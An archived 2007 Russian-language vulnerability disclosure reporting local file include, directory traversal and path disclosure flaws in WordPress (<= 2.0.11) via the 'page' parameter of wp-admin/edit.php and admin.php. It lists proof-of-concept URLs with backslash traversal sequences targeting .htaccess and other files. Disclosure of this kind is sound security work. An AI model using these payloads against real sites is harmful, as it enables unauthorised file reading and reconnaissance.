Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18768
HistoryDec 30, 2007 - 12:00 a.m.

New Local file include, Directory traversal and Full path disclosure in WordPress

2007-12-3000:00:00
vulners.com
4142

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною новых Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файлах edit.php и admin.php в параметре page

Full path disclosure:

http://site/wp-admin/edit.php?page=

http://site/wp-admin/admin.php?page=

Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).

Local file include и Directory traversal:

http://site/wp-admin/edit.php?page=\..\..\file.php

http://site/wp-admin/edit.php?page=\..\..\.htaccess

http://site/wp-admin/admin.php?page=\..\..\file.php

http://site/wp-admin/admin.php?page=\..\..\.htaccess

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1683/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua